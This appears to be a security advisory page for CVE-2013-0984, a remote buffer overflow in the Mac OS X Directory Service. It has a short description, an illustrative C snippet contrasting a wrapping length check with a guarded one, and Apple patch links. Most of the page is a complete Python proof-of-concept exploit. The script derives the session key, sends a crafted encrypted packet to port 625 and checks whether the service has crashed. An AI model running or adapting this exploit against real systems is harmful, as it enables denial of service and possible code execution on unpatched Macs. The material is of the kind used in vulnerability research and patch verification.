Apple Mac OS X Directory Service Remote Buffer Overflow Vulnerability (CVE-2013-0984)
Published: 2013-06-04    Updated: 2013-06-07
Affected systems: Apple Mac OS X < 10.6.8
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 60328
CVE(CAN) ID: CVE-2013-0984
Apple Mac OS X is Apple's operating system software.
The directory service in Apple Mac OS X versions before 10.6.8 contains a remote buffer overflow vulnerability. A remote attacker can exploit it with a specially crafted message to execute arbitrary code or cause a denial of service.
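The length-check failure behind this advisory is an unsigned subtraction that wraps when the sender-supplied length exceeds the data actually received; the test code on this page notes the bypass as (0xe0 + 0x10) - 0x100. The C below is an added illustration of that bug class and is not Apple's code: the record layout, the 0x10 header size and the 16-byte trailer requirement are assumptions used only to show the vulnerable pattern beside its checked form.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical reconstruction (not Apple's code): a message carries a
 * sender-supplied record length, and the parser must decide whether that
 * record, plus a 16-byte trailer, fits in the bytes actually received. */

#define MSG_HEADER_LEN 0x10u  /* assumed fixed header size */
#define TRAILER_LEN    16u    /* assumed trailer that must follow the record */

/* Vulnerable pattern: "what is left" computed by unsigned subtraction.
 * When field_len is larger than the bytes on hand the result wraps to a
 * huge value, the room-for-trailer test passes, and a later copy of
 * field_len bytes runs past the buffer. */
bool record_fits_unsafe(uint32_t received_len, uint32_t field_len) {
    uint32_t remaining = (received_len + MSG_HEADER_LEN) - field_len; /* wraps */
    return remaining >= TRAILER_LEN;
}

/* Checked form: guard the addition, then compare before subtracting so no
 * intermediate value can wrap. */
bool record_fits_safe(uint32_t received_len, uint32_t field_len) {
    uint32_t total;
    if (received_len > UINT32_MAX - MSG_HEADER_LEN)
        return false;                     /* received_len + header would wrap */
    total = received_len + MSG_HEADER_LEN;
    if (field_len > total)
        return false;                     /* record longer than the data we hold */
    return total - field_len >= TRAILER_LEN;
}

int main(void) {
    /* Constructed sample matching the advisory's test code: 0xe0 payload
     * bytes plus a 0x10 header, and a claimed record length of 0x100. */
    uint32_t received = 0xe0, claimed = 0x100;
    printf("unsafe check accepts: %d\n", record_fits_unsafe(received, claimed)); /* 1 */
    printf("safe check accepts:   %d\n", record_fits_safe(received, claimed));   /* 0 */
    return 0;
}
```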
<*Source: Nicolas Economou
  Link: http://support.apple.com/kb/HT5784 *>

Test method:
--------------------------------------------------------------------------------
Warning: The following program (method) may be offensive in nature and is provided only for security research and teaching. Use at your own risk!

# Python 2 script using PyCrypto (Crypto.Cipher), as published.
from Crypto.Cipher import AES
import socket
import struct
import time


def send_packet(sock, data):
    # DSPX framing: 4-byte magic, big-endian 32-bit length, then the data.
    packet = ""
    packet += "DSPX"
    packet += struct.pack(">I", len(data))
    packet += data
    sock.send(packet)


def get_crypted_data(shared_key, data):
    # AES-CBC with an all-zero IV.
    cipher = AES.new(shared_key, AES.MODE_CBC, "\x00" * 16)
    crypted_data = cipher.encrypt(data)
    return crypted_data


def attack(ip, port):
    try:
        p = socket.socket()
        p.connect((ip, port))
    except Exception, e:
        print e
        return

    data = ""
    data += "DHN2"
    data += "\x00" * 63 + "\x02"  # Key that generates a DERIVED KEY, identical to the one received.

    # Packet 1
    print ("\nSending my public key ...")
    send_packet(p, data)
    resp = p.recv(65536)

    # Key sent by server.
    key_sent = resp[8: len(resp) - 1]

    server_key = ""
    # Flip the number.
    for i in range(len(key_sent) - 1, -1, -1):
        server_key += key_sent[i]

    # String to (a huge) number conversion.
    big_number = ""
    for c in server_key:
        big_number += "%.2x" % ord(c)
    big_number = int(big_number, 16)

    prime = 2 ** 128

    # Obtaining the SHARED KEY (To be used for AES encryption).
    derived_key = pow(big_number, 1, prime)
    magic_number = derived_key

    derived_key_string = ""
    # Transform key into a string.
    while magic_number != 0:
        resto = magic_number % 256
        magic_number /= 256
        derived_key_string += struct.pack("B", resto)[0]

    print "shared key: %s" % repr(derived_key_string)

    # Handshake.
    print "Sending the Handshaking"
    data = "A" * 4 + ("\x0c" * 12)
    crypted_data = get_crypted_data(derived_key_string, data)
    send_packet(p, crypted_data)
    resp = p.recv(65536)

    data = ""
    data += "A" * 0x1b
    data += "\x02"
    data += struct.pack("<I", 0x10000000)  # Evil value.
    data += struct.pack("<I", 0x100)  # Value to be used by the last patched version.
    data += "A" * (0x34 - len(data))
    data += struct.pack(">I", 0x1172 + 1)  # Operation code.
    data += struct.pack(">I", 0x99999999)
    data += struct.pack(">I", 0x80808080)
    data += struct.pack(">I", 0x81818181)
    data += struct.pack(">I", 0x66666666)
    data += "B" * (0xe0 - len(data))  # Bypass in previous Mac OSX versions ( Integer underflow -> ( ( 0xe0 + 0x10 ) - 0x100 )
    data += "\x00" * 16
    crypted_data = get_crypted_data(derived_key_string, data)

    # TRIGGER
    print ("Sending the evil packet")
    send_packet(p, crypted_data)

    p.settimeout(10)
    try:
        p.recv(65536)
    except Exception, e:
        print e
    p.close()

    try:
        print ("\nwaiting 10 seconds for check ...")
        time.sleep(10)
        p = socket.socket()
        p.settimeout(10)
        p.connect((ip, port))
    except Exception:
        print ("\nThe attack was successful !\n")
        return

    print ("\nThe attack wasn't successful\n")
    return


ip = "192.168.100.1"
port = 625
attack(ip, port)

Suggestions:
--------------------------------------------------------------------------------
Vendor patch:
Apple
-----
Apple has released a security bulletin (HT5784) and the corresponding patch for this issue:
HT5784: About the security content of OS X Mountain Lion v10.8.4 and Security Update 2013-002
Link: http://support.apple.com/kb/HT5784
Patch download: http://www.apple.com/support/downloads/